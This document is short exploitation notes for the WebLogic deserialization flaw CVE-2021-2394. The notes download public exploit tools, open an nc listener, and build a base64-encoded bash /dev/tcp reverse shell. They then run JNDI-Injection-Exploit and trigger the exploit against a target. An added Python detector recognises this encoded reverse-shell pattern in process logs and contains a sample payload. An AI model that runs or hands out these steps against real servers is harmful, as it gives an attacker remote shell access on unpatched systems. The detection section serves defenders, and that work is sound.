[Notes] Exploiting CVE-2021-2394

Preface

Use welk1n/JNDI-Injection-Exploit together with lz2y/CVE-2021-2394 to exploit the WebLogic deserialization vulnerability.
Default port: 7001

Download the projects

JNDI-Injection-Exploit

wget https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

CVE-2021-2394

wget https://github.com/lz2y/CVE-2021-2394/releases/download/2.0/CVE_2021_2394_jar.zip
unzip CVE_2021_2394_jar.zip -d CVE_2021_2394_jar
cd CVE_2021_2394_jar

The attacker listens for the reverse shell

nc -lvp <port>

Base64-encode the reverse shell command

echo -n "bash -i >& /dev/tcp/<ip>/<port> 0>&1" | base64

exp

<base64>: the Base64-encoded reverse shell command from the previous step

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,<base64>}|{base64,-d}|{bash,-i}" -A <ip>
[ADDRESS] >> 127.0.0.1
[COMMAND] >> bash -c {echo,<base64>}|{base64,-d}|{bash,-i}
----------------------------JNDI Links----------------------------
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://127.0.0.1:1099/xxxxxx
ldap://127.0.0.1:1389/xxxxxx
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://127.0.0.1:1099/xxxxxx
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://127.0.0.1:1099/xxxxxx
ldap://127.0.0.1:1389/xxxxxx

----------------------------Server Log----------------------------
2024-06-20 11:29:04 [JETTYSERVER]>> Listening on 0.0.0.0:8180
2024-06-20 11:29:04 [RMISERVER] >> Listening on 0.0.0.0:1099
2024-06-20 11:29:04 [LDAPSERVER] >> Listening on 0.0.0.0:1389

Trigger

java -jar CVE_2021_2394.jar <ip> <port> ldap://127.0.0.1:1389/xxxxxx
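From the defender's side, the brace-expansion form `bash -c {echo,<base64>}|{base64,-d}|{bash,-i}` used above is what lands in process-creation telemetry on the WebLogic host, and a naive search for "base64 -d" does not match it. The following is an added example (not part of the original notes or of either tool) that recognises that shape in command lines, decodes the embedded payload and flags reverse-shell markers; the sample command lines and the 10.0.0.5:4444 address are constructed.

```python
import base64
import re

# Constructed sample process-creation command lines (not real telemetry).
# The third one mirrors the brace-expansion shape used in the exploit step.
_CONSTRUCTED_PAYLOAD = base64.b64encode(
    b"bash -i >& /dev/tcp/10.0.0.5/4444 0>&1"
).decode()
SAMPLE_CMDLINES = [
    "java -jar weblogic.jar",
    "bash -c ls -la /tmp",
    "bash -c {echo,%s}|{base64,-d}|{bash,-i}" % _CONSTRUCTED_PAYLOAD,
]

# In bash, {echo,X} expands to "echo X": braces and commas replace spaces,
# so the literal strings "echo " and "base64 -d" never appear in the argv.
BRACE_PATTERN = re.compile(
    r"\{echo,([A-Za-z0-9+/=]+)\}\s*\|\s*\{base64,-d\}\s*\|\s*\{(?:ba)?sh(?:,-i)?\}"
)

# Substrings that indicate an outbound interactive shell in the decoded command.
REVERSE_SHELL_MARKERS = ("/dev/tcp/", "nc ", "ncat ", "socat ")


def decode_payload(cmdline):
    """Return the decoded inner command if cmdline uses the brace/base64 pattern, else None."""
    m = BRACE_PATTERN.search(cmdline)
    if not m:
        return None
    try:
        # validate=True rejects junk that merely looks like base64.
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:
        return None


def classify(cmdline):
    """Return 'reverse_shell', 'encoded_command' or 'benign' for one command line."""
    decoded = decode_payload(cmdline)
    if decoded is None:
        return "benign"
    if any(marker in decoded for marker in REVERSE_SHELL_MARKERS):
        return "reverse_shell"
    return "encoded_command"


def scan(cmdlines):
    """Return (cmdline, verdict, decoded) for every non-benign command line."""
    hits = []
    for cmdline in cmdlines:
        verdict = classify(cmdline)
        if verdict != "benign":
            hits.append((cmdline, verdict, decode_payload(cmdline)))
    return hits
```

Point the same check at the `[COMMAND] >>` lines of the JNDI-Injection-Exploit server log to confirm what a captured listener was configured to deliver.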

Done

References

Bilibili: xiaodisec